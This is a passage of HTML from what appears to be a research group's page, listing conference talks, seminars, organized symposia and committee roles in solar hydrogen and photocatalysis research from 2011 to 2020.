adjustable compositions: Bandgap and nanostructure control for visible-light-driven
photocatalytic
H<sub>2</sub>
evolution</strong>”, XXI International Materials Research Congress, Cancun, Mexico, August
2012
</li>
<li>
<strong><u>Y. Liu</u></strong>, <strong>J.G. Jiang</strong>, <strong>M.T. Li</strong>, <strong>L.J.
Guo</strong>, “<strong>Photoelectrochemical performance of CdS nanorods grafted on
vertically
aligned TiO<sub>2</sub> nanorods</strong>”, XXI International Materials Research Congress,
Cancun, Mexico, August 2012
</li>
<li>
<strong>L.Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Quantum-confined metal oxide
hetero-nanostructures for clean energy</strong>”, 20<sup>th</sup> International Conference
on
Composites/Nano Engineering, Beijing, China, July 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>All oxide hetero-nanostructures
for
clean energy</strong>”, 2<sup>nd</sup> International Defense Nanotechnology Application
Center
Symposium on Nanotechnology, Yonsei University, Seoul, Korea, July 2012
</li>
<li>
<strong> L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Invited talk & Session chair</strong>)</span>,
“<strong>Aqueous design of quantum-confined metal oxide arrayed thin films</strong>”,
6<sup>th</sup> International Conference on Technological Advances of Thin Films & Surface
Coatings, Symposium on Oxide Thin Films & Nanostructures, Singapore, July 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong class="blue_color">Panel discussion Chair/Symposiarch</strong>)</span>,
International Union of Materials Research Societies, International Conference of Young
Researchers
on Advanced Materials, Symposium on Energy & Environment, Session on Hydrogen generation
&
Storage, Singapore, July 2012
</li>
<li>
<strong>Q.Y. Chen</strong>, “<strong>Surfactant’s Effect on the Photoactivity of
Fe-doped TiO<sub>2</sub></strong>”, 2012 Chinese Materials Conference, Taiyuan, China,
July
2012
</li>
<li>
<strong>D.W. Jing</strong> <span class="invited">(<strong
class="blue_color">Invited</strong>)</span>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic
hydrogen production under direct solar light: materials preparation, system optimization and
pilot
demonstration</strong>”, 4<sup>th</sup> Sino-Thai Workshop on Renewable Energy, Tianjin,
May
2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Aqueous design of
quantum-confined
metal oxide hetero-nanostructures</strong>”, 2012 MRS Spring Meeting, Cluster on
Nanostructured materials and devices, Symposium BB: Solution Synthesis of Inorganic Films and
Nanostructured Materials, San Francisco, CA, USA, April 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>The
photocatalytic activity of Cd<sub>0.5</sub>Zn<sub>0.5</sub>S/TNTs (titanate nanotubes)
synthesized
by a two-step hydrothermal method</strong>”, Working Group Meeting for Discussing Green
Innovation Initiatives Especially on Renewable Energy, Bonn, Germany, March 2012
</li>
<li>
<strong>Y.J. Lv </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Solar hydrogen production by biomass gasification in supercritical water:
Hydrogen
production and hydrodynamics characteristics in supercritical water fluidized bed</strong>”,
243<sup>rd</sup> ACS National Meeting & Exposition, March 2012
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Nanostructure
and Nanoheterojunction for High-Efficiency Photocatalytic and Photoelectrochemical Water
Splitting</strong>”, 36<sup>th</sup> International Conference and Exposition on Advanced
Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Surface doping of W<sup>6+</sup>
for
enhanced photoelectrochemical water splitting over α-Fe<sub>2</sub>O<sub>3</sub> nanorod
photoanodes</strong>”,
36<sup>th</sup> International Conference and Exposition on Advanced Ceramics and Composites,
Daytona
Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Enhanced charge separation for high efficiency
photocatalytic hydrogen production</strong>”, 36<sup>th</sup> International Conference and
Exposition on Advanced Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong><u>J.W. Shi</u></strong>, J.H. Ye, <strong>L.J. Ma</strong>, S.X. Ouyang, <strong>D.W.
Jing</strong>, <strong>L.J. Guo</strong>, “<strong>Upconversion luminescent Er doped
SrTiO<sub>3</sub>: Site-selected substitution and visible-light-driven photocatalytic
H<sub>2</sub>
or O<sub>2</sub> evolution</strong>”, 36<sup>th</sup> International Conference and
Exposition
on Advanced Ceramics and Composites, Daytona Beach, Florida, USA, January 22-27, 2012
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="blue_color">Keynote</strong>)</span>,“<strong>Low cost all-oxide
hetero-nanostructures for direct solar water splitting</strong>”, 2012 US-Vietnam Workshop
on
Solar Energy Conversion, Ho Chi Minh City, Vietnam, January 2012
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong
class="blue_color">Plenary</strong>)</span>,“<strong>Facile Aqueous Growth of Hematite
Photoanodes for Solar Water Splitting</strong>”, 12<sup>th</sup> International Conference
on
Clean Energy, Xi’an, China, January 2012
</li>
<li>
<strong>Q.Y. Chen </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Co-production of
electricity
and hydrogen from microbial fuel cell</strong>”, 12<sup>th</sup> International Conference
on
Clean Energy, Xi’an, China, January 2012
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2011 (7)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="7">
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>Single-crystal
nanosheet-based hierarchical AgSbO<sub>3</sub> with exposed {001} facets: topotactic synthesis
and
enhanced photocatalytic activity</strong>”, 3<sup>rd </sup>China-Australia Symposium for
Materials Science, Gold Coast, Queensland, Australia, November 2011
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Ma</strong>, <strong>P. Wu</strong>, <strong>Z.H.
Zhou</strong>, <strong>P.H. Guo</strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>A Novel Sn<sub>2</sub>Sb<sub>2</sub>O<sub>7</sub> Nanophotocatalyst for
Visible-light-driven H<sub>2</sub> Evolution</strong>”, 3<sup>rd</sup> China-Australia
Symposium for Materials Science, Gold Coast, Queensland, Australia, November 2011
</li>
<li>
<strong><u>P. Wu</u></strong>, <strong>Z.H. Zhou</strong>, <strong>J.W. Shi</strong>,
“<strong>First-principles calculations of Cd<sub>1-x</sub>Zn<sub>x</sub>S doped with
alkaline
earth metals for photocatalytic hydrogen generation</strong>”, 12<sup>th</sup> National
Hydrogen Energy Conference and 4<sup>th</sup> Hydrogen Seminar of the three geographic areas,
Wuhan,
China, October 2011
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong
class="blue_color">Invited</strong>)</span>,“<strong>High-Efficiency
Solar Driven Photocatalytic Water Splitting for Hydrogen Generation: on Design concepts
Catalytic
Materials and Pilot-Scale Demonstration</strong>”, 9<sup>th</sup> International Meeting of
Pacific Rim Ceramic Societies, Cairns, North Queensland, Australia, July 2011
</li>
<li>
<strong><u>J.W. Shi</u></strong>, J.H. Ye, Q.Y. Li, <strong>P.H. Guo</strong>, G.C. Xi, <strong>L.J.
Guo</strong>, “<strong>Self-templated synthesis of single-crystal AgSbO<sub>3</sub>
nanosheets
for visible-light-driven photocatalytic O<sub>2</sub> evolution</strong>”, 9<sup>th</sup>
International Meeting of Pacific Rim Ceramic Societies, Cairns, North Queensland, Australia,
July
2011
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Solar to Hydrogen - From Concepts Design of Advanced</strong>”,
2<sup>nd</sup> International Workshop on Renewable Energy, July 2011
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Surface Modification of α-Fe<sub>2</sub>O<sub>3</sub>
Nanorod Array Photoanodes for Improved Light-Induced Water Splitting</strong>”, 2011 MRS
Spring Meeting and Exhibit, Symposium F: Renewable Fuels and Nanotechnology, San Francisco, USA,
April 2011
</li>
</ol>
</div>
<div id="divseminars">
<h3 align="center">
<strong><a id="seminars"></a>Seminars</strong> <span class="listcount">(68)</span></h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="68">
<li>
<strong>L. Vayssieres</strong>, <strong>McGill University</strong>, Department of Materials
Engineering, <strong>Host: Prof. K. H. Bevan</strong>, Montreal, Canada, May 15, 2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>CNRS-Lasers</strong>, <strong>Plasmas & Photonics
Processes
Laboratory (LP3)</strong>, <strong>Host: Prof. A. Kabashin</strong>, Marseille, France, January
22,
2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Institut d'Electronique, de Microelectronique et de
Nanotechnologie (IEMN)</strong>, <strong>Host: Prof. E. Dogheche</strong>, Villeneuve d'ascq,
France, January 14, 2020
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Northwestern Polytechnic University</strong>, Institute
for
Flexible Electronics, <strong>Host: Prof. I. Perepichka</strong>, Xi'an, China, December 3, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Seoul National University</strong>, Center for
Nanoparticle
Research, Institute for Basic Science, <strong>Host: Prof. T. Hyeon</strong>, Seoul, Korea,
November
15, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Emory University</strong>, Emory Renewable Energy
Research &
Education Consortium, Department of Chemistry, <strong>Host: Prof. T. Lian</strong>, Atlanta,
GA,
USA, October 18, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Chang’an University</strong>, Chemical Engineering &
Technology, School of Environmental Science & Engineering, HongXue Lecture Series, <strong>Host:
Prof. Z. Zhou</strong>, Xi'an, China, March 13, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Center for Research & Advanced Studies of the National
Polytechnic Institute (CINVESTAV)</strong>, Department of Applied Physics, <strong>Host: Prof.
G.
Oskam</strong>, Merida, Yucatan, Mexico, February 25, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Ecole Polytechnique Federale de Lausanne (EPFL)</strong>,
Laboratory of Renewable Energy Science & Engineering, <strong>Host: Prof. S. Haussener</strong>,
Lausanne, Switzerland, December 21, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Santa Cruz</strong>, Department
of
Chemistry & Biochemistry, <strong>Host: Prof. Y. Li</strong>, Santa Cruz, CA, USA, October 31,
2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Shaanxi University of Science & Technology</strong>,
Frontier Institute of Science & Technology, School of Environmental Science & Engineering,
<strong>Host: Prof. C. Y. Wang</strong>, Xi'an, China, October 18, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>National University of Singapore</strong>, Department of
Mechanical Engineering, <strong>Host: Prof. L. Lu</strong>, Singapore, July 26, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Yale University</strong>, School of Engineering &
Applied
Sciences, Department of Chemical & Environmental Engineering Seminar Series, <strong> Host:
Prof. S.
Hu</strong>, New Haven, CT, USA, April 25, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Energy
Storage & Distributed Resources Division, Energy Technologies Area, Berkeley Electrochemistry
Seminar Series, <strong> Host: Dr. R. Kostecki</strong>, Berkeley, CA, USA, April 16, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>California Institute of Technology</strong>, Joint
Center
for Artificial Photosynthesis, JCAP Seminar Series,<strong> Host: Dr. C. X. Xiang</strong>,
Pasadena, CA, USA, March 27, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Davis</strong>, College of
Engineering, <strong> Host: Prof. S. Islam</strong>, Kemper Hall, Davis, CA, USA, February 28,
2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of California Berkeley</strong>, Renewable
and
Appropriate Energy Lab (RAEL), Energy & Resources Group, <strong> Host: Dr. D. Best</strong>,
Barrows Hall, Berkeley, CA, USA, January 31, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>National Taiwan University</strong>, Department of
Chemistry, <strong> Host: Prof. R. S. Liu</strong>, Taiwan, China, November 10, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Tamkang University</strong>, Department of Physics,
<strong>
Host: Prof. C. L. Dong</strong>, Taipei, China, November 9, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Warsaw</strong>, Centre of New
Technologies,
<strong> Host: Dr. A. Jelinska</strong>, Warsaw, Poland, May 30, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Szeged</strong>, Department of Inorganic &
Analytical Chemistry, <strong> Host: Prof. K. Schrantz</strong>, Szeged, Hungary, April 26, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Hungarian Academy of Sciences</strong>,<strong> Host:
Prof.
J. S. Pap</strong>, MTA Headquarters, Readings Hall, Budapest, Hungary, April 20, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>ETS-Ecole de Technologie Superieure</strong>, <strong>
Host:
Prof. S. Cloutier</strong>, Montreal, QC, Canada, April 6, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong> INRS-Institut National de la Recherche
Scientifique</strong>, <strong> Host: Prof. F. Vetrone</strong>, Varennes, QC, Canada, April 5,
2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Electronic Science & Technology of
China</strong>, Institute of Fundamental and Frontier Sciences, <strong>Host: Prof. Z. M.
Wang</strong>, Chengdu, P.R. China, December 16, 2016
</li>
<li>
<strong>Y. Liu</strong>
, <strong>Lawrence Berkeley National Lab</strong>, Joint Center for Artificial
Photosynthesis-JCAP
T3 Meeting (video conference), <strong>Host: Dr. F. M. Toma</strong>, Berkeley, CA, USA,
December 7,
2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Houston</strong>, Physics Colloquium,
<strong>Host:
Prof. O. K. Varghese</strong>, Houston, TX, USA, November 17, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <STRONG>SABIC Technology Center</STRONG>, Nanotechnology,
Corporate
Research & Development, <strong>Host: Dr. I. N. Odeh</strong>, Sugar Land, TX, USA, November
15,
2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Rice University</strong>, IEEE Photonics Society Houston
Chapter Seminar, <strong>Host: Prof. I. Thomann</strong>, Houston, TX, USA, November 14, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Joint
Center
for Artificial Photosynthesis-JCAP Seminar Series, Chu Hall, <strong>Host: Dr. I. Sharp</strong>,
Berkeley, CA, USA, July 20, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Toronto</strong>, IEEE Toronto section,
<strong>Host: Prof. N. P. Kherani</strong>, Toronto, ON, Canada, June 24, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of South Florida</strong>, Department of
Physics,
<strong>Host: Prof. M. H. Phan</strong>, Tampa, FL, USA, April 21, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Princeton University</strong>, Princeton Institute for
the
Science and Technology of Materials and Princeton Center for Complex Materials PRISM/PCCM
seminar
series, <strong>Host: Prof. B. Koel</strong>, Bowen Hall Auditorium, Princeton, NJ, USA, April
15,
2016
</li>
<li>
<strong>S.H. Shen</strong>,<strong> University of Wisconsin Madison</strong>, Department of
Chemistry, <strong>Host: Prof. Song Jin</strong>, Madison, WI, USA, February 23, 2016
</li>
<li>
<strong>Y. Liu</strong>,<strong> Lawrence Berkeley National Laboratory</strong>, Materials
Science
Division, Joint Center for Artificial Photosynthesis, <strong>Host: Dr. J. Ager</strong>,
Berkeley,
CA, October 12, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Warsaw University</strong>, Centre of New Technologies,
<strong>Host: Prof. J. Augustynski</strong>, Warsaw, Poland, Sep. 21, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>EMPA-Swiss Federal Laboratories for Materials Science
&
Technology</strong>, <strong>Host: Dr. A. Braun</strong>, Dubendorf, Switzerland, August 20,
2015
</li>
<li>
<strong>L. Vayssieres</strong>, <STRONG><SPAN
lang="EN-US">Concordia University</SPAN></STRONG><SPAN
lang="EN-US">,</SPAN> Department of Physics, <SPAN lang="EN-US"></SPAN><STRONG><SPAN
lang="EN-US"></SPAN>Host: Prof. P. Bianucci</STRONG>, Montreal, Canada, June 18, 2015
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, <STRONG>Ecole Polytechnique de Montreal</STRONG><SPAN
lang="EN-US">,</SPAN> Departement de Genie Physique, <STRONG>Host: Prof. C. Santato</STRONG>,
Montreal, Canada, June 12, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">The University of British Columbia</span></strong><span
lang="EN-US">,</span> Clean Energy Research Centre<span lang="EN-US">,</span><strong><span
lang="EN-US"> </span>Host: Prof. W. Merida</strong>, Vancouver, Canada, May 19, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">Xi'an Jiaotong University</span></strong><span
lang="EN-US">,</span> Bioinspired Engineering and Biomechanics Center<span
lang="EN-US">,</span><strong><span
lang="EN-US"> </span>Host: Prof. T. J. Lu</strong>, Xi'an, China, April 30, 2015
</li>
<li>
<strong>L.J. Guo</strong>, <strong>Yangze University</strong>, Geophysics and Oil Resource
Institute, <strong>Host: Prof. Z.S. Zhang</strong>, Jingzhou, Hubei, China, December 23, 2014
</li>
<li>
<strong>L.J. Guo</strong>,<strong> Nanjing Technology University</strong>, College of Materials
Science and Engineering, <strong>Host: Prof. H. Zhang</strong>, Nanjing, JiangSu, China,
December 2,
2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> Massachusetts Institute of Technology</strong>,
Department
of Materials Science and Engineering, <strong>Host: Prof. H.L. Tuller</strong>, Cambridge, MA,
November 25, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Merced</strong>, School of
Engineering,<strong> Host: Prof. J. Lu</strong>, Merced, CA, August 29, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Advanced
Light Source - Center for X-ray Optics Seminar Series, <strong>Host: Prof. T. Cuk</strong>,
Berkeley, CA, August 27, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Berkeley</strong>, Department
of
Chemistry,<strong> Host: Prof. T. Cuk</strong>, Berkeley, CA, August 26, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">Peking University</span></strong><span
lang="EN-US">,</span> <span lang="EN-US">School of Physics, Institute of Condensed matter & Materials Physics, State Key Lab for Mesoscopic Physics,</span><strong><span
lang="EN-US"> </span>Host: Prof. Q. Zhao</strong>, Beijing, China, May 16, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <span lang="EN-US"><strong>Chinese Academy of Sciences</strong>, Technical Institute of Physics & Chemistry, </span><span
lang="EN-US">Key Laboratory of Photochemical Conversion & Optoelectronic Materials,</span><strong><span
lang="EN-US"> </span>Host: Prof. T. Zhang</strong>, Beijing, China, May 12, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Berkeley</strong>, Department
of
Mechanical Engineering, <strong>Host: Prof. S.S. Mao</strong>, Berkeley, CA, April 28, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> McGill University</strong>, Department of
Electrical
& Computer Engineering,<strong> Host: Prof. Z. Mi</strong>, Montreal, Canada, April 14,
2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> Arizona State University</strong>, College of Technology
& Innovation, Department of Engineering & Computing Systems,<strong> Host: Prof. A. M.
Kannan</strong>, Polytechnic Campus, Mesa, AZ, USA, March 11, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>The University of Auckland</strong>,
School of Chemical Sciences, <strong>Host: Prof. J. Travas-Sejdic</strong>,
Auckland, New Zealand, December 6, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Uppsala</strong><strong> University</strong>, Inorganic
Chemistry Seminar, Angstrom Laboratory, <strong>Host: Prof. G. Westin</strong>, Uppsala, Sweden,
November 5, 2013
</li>
<li><strong>I. Zegkinoglou</strong>, <strong>Lawrence Berkeley National Laboratory</strong>,
Materials Sciences Division, Host: <strong>Dr. R. Schoenlein</strong>, Berkeley, CA,
October
31, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> McGill University</strong>, Chemistry
Department,<strong> Host: Prof. D. Perepichka</strong>, Montreal, Canada, October 25, 2013
</li>
<li><strong>I. Zegkinoglou</strong>, <strong>Molecular Foundry</strong>, Theory of
Nanostructured
Materials Facility, U.S. Department of Energy Nanoscale Science Research Center, Lawrence
Berkeley
National Laboratory, <strong>Host: Dr. D. Prendergast</strong>, Berkeley, CA, July 31, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> Lawrence Berkeley National Laboratory</strong>, Advanced
Light Source and Center for X-ray Optics,<strong> Host: Dr. J.-H. Guo</strong>, Berkeley,
CA,
June 26, 2013
</li>
<li><strong>L. Vayssieres</strong>, <strong>Stanford</strong><strong> University</strong>,
Center
on Nanostructuring for Efficient Energy Conversion, US DOE Energy Frontier Research
Center, <strong>Host: Prof. X.L. Zheng</strong>, Palo Alto, CA, June 24, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> University of California Davis</strong>, Department of
Chemistry, <strong>Host: Prof. F. Osterloh</strong>, Davis, CA, May 16, 2013
</li>
<li><strong>L. Vayssieres</strong>, <strong>Vietnam Academy of Science and Technology</strong>,
Institute of Materials Science, <strong>Host: Prof. Nguyen Van Hieu</strong>, Hanoi, Vietnam,
November 5, 2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>National University of Singapore</strong>, Department of
Materials Science & Engineering,<strong> Host: Prof. Q. Wang</strong>, Singapore, July 11,
2012
</li>
<li><strong>L. Vayssieres</strong>, <strong> Nanyang Technological University</strong>, School of
Physical & Mathematical Sciences, Department of Physics & Applied Physics, <strong>Host:
Prof. H. J. Fan</strong>, Singapore, July 9, 2012
</li>
<li><strong>E. Traversa</strong>, <strong>Chalmers Institute of Technology</strong>, Goteborg,
Sweden,
June 16-17, 2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>PARC Xerox Company</strong>,<strong> Host: Dr. B.
Hsieh</strong>, Palo Alto, CA, May 15, 2012
</li>
<li>
<u>C.X. Kronawitter</u>, <strong>L. Vayssieres</strong>, B.R. Antoun, S.S. Mao, <strong>Yale
University</strong>, Center for Interface Structures & Phenomena, New Haven, CT, April 2,
2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>Nikon & Essilor International Joint Research Center
Co.</strong>, <strong>Ltd.</strong>, <strong>Host: Dr. R. Bosmans</strong>, Kawasaki (Kanagawa),
Japan, March 22, 2012
</li>
<li>
<u>C.X. Kronawitter</u>, <strong>L. Vayssieres</strong>, B.R. Antoun, S.S. Mao, <strong>Brookhaven
National Laboratory</strong>, Photon Sciences Directorate, Upton, NY, February 19, 2012
</li>
</ol>
</div>
<div id="divorganizers">
<h3 align="center">
<strong><a id="organizers"></a>International Conference / Symposium / Workshop Chairman &
Organizer</strong> <span class="listcount">(19)</span></h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="19">
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Session Chairman, <strong>Symposium on Energy
Conversion</strong>, International Conference on Electroceramics (ICE), Ecole Polytechnique
Federale
de Lausanne (EPFL), Switzerland, July 14-19, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, lead-Organizer and Chairman, <strong>Symposium on Latest
Advances in
Solar Fuels</strong>, European MRS, Nice, France, May 21-31, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>6<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 17, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer, <strong>XXVII International Materials Research
Congress (IMRC 2018)</strong>, Symposium C3 on Solar Hydrogen Production, Cancun, Mexico, August
19-24, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>5<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 25, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>4<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 19, 2016
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, Co-organizer and Co-chairman, <strong>9<sup>th</sup>
International
Conference on High Temperature Ceramic Matrix Composites & </strong><strong>Global Forum on
Advanced Materials and Technologies for Sustainable Development</strong>, Symposium G2 on
Functional
Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 26-30, 2016
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, Co-Organizer and Chairman, <STRONG>3<sup>rd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</STRONG>, Xi'an, P. R. China,
September 28, 2015<BR>
</li>
<li>
<strong>S.H. Shen</strong>, Lead organizer and Chairman, <strong>Symposium on Solar Hydrogen and
Nanotechnology X</strong>, SPIE Optics & Photonics, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and
Co-chairman, <strong>Symposium J: </strong><strong>Latest
Advances in Solar Water Splitting</strong>, 2015 Spring Meeting of the Materials Research
Society
(MRS), San Francisco, USA, April 6-10, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, Organizer and Co-chairman, <strong>2<sup>nd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 19, 2014
</li>
<li><strong>L. Vayssieres</strong>, Co-organizer and Co-chair, <strong>Symposium on Solar
Fuels</strong>, American Ceramic Society Materials Challenges in Alternative& Renewable
Energy
(MCARE 2014), Hilton Clearwater Hotel, Clearwater, FL, USA, February 16-20, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, Chairman and Co-organizer, <strong>1<sup>st</sup>
International Workshop on Nanotechnology</strong>,<strong> Renewable Energy &
Sustainability</strong>, Xi'an, P. R. China, September 25, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer, <strong>Symposium S19 on Advances in
Photocatalytic
Materials for Energy and Environmental Applications</strong>, 10<sup>th </sup>PACRIM meeting,
San
Diego, CA, USA, June 2-7, 2013
</li>
<li><strong>L. Vayssieres</strong>, Lead organizer and Chairman, <strong>Symposium Z on</strong>
<strong>Nanotechnology & Sustainability</strong>, 2013 Spring Meeting of the Materials
Research
Society (MRS), San Francisco, USA, April 1-5, 2013
</li>
<li>
<strong>E. Traversa</strong>, Co-organizer,<strong> Symposium on</strong> <strong>Materials as
Tools
for Sustainability</strong>, 2012 Fall Meeting of the Materials Research Society, Boston,
November
26-30, 2012
</li>
<li>
<strong>E. Traversa</strong>, Co-organizer, <strong>Symposium on</strong> <strong>Solid State
Ionic
Devices 9-Ion Conducting Thin Films and Multilayers</strong>, Pacific Rim Meeting on
Electrochemical
and Solid-State Science PriME 2012, Joint International Meeting: 222<sup>nd </sup>Meeting of the
Electrochemical Society and 2012 Fall Meeting of the Electrochemical Society of Japan, Honolulu,
October 7-12, 2012
</li>
<li>
<strong>L.J. Guo</strong>, Chairman, <strong>Sino-German Workshop on Energy
Research</strong>,<strong> </strong>Xi'an, P. R. China, September 5-8, 2012
</li>
<li><strong>L. Vayssieres</strong>, Lead organizer and Chairman, <strong>Symposium on Solar Hydrogen
and
Nanotechnology VII</strong>, SPIE Optics & Photonics meeting, San Diego, CA, USA, August
12-16,
2012
</li>
</ol>
</div>
<div id="divcommittee">
<h3>
<strong><a id="committee">International Advisory, Program, Executive or Steering Committee Member
</a></strong><span class="listcount">(29)</span>
</h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="29">
<li>
<strong>L. Vayssieres</strong>, <strong>The American Ceramic Society Global Ambassador
Program </strong> (2016-)
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on Energy, Materials &
Photonics</strong>, Montreal, QC, Canada, July 8-11, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>UNESCO Africa Chair in Nanoscience
&Nanotechnology </strong>(2013-)
</li>
<li>
<strong>L. Vayssieres, Indian Association of Nanoscience & Nanotechnology (IANN)</strong>
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2018</strong>, San Diego, CA, USA, August 19-23, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <Strong>3<sup>rd</sup> International Symposium on Energy and
Environmental Photocatalytic Materials(EEPM3)</Strong>, Kraków, Poland, May 2018
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2017</strong>, San Diego, CA, USA, August 6-10, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2016</strong>, San Diego, CA, USA, August 28-September 1, 2016
</li>
<li>
<strong>S.H. Shen</strong>,
<strong>Energy Materials Nanotechnology (EMN) Meeting on Ultrafast Research</strong>, Las Vegas,
NV,
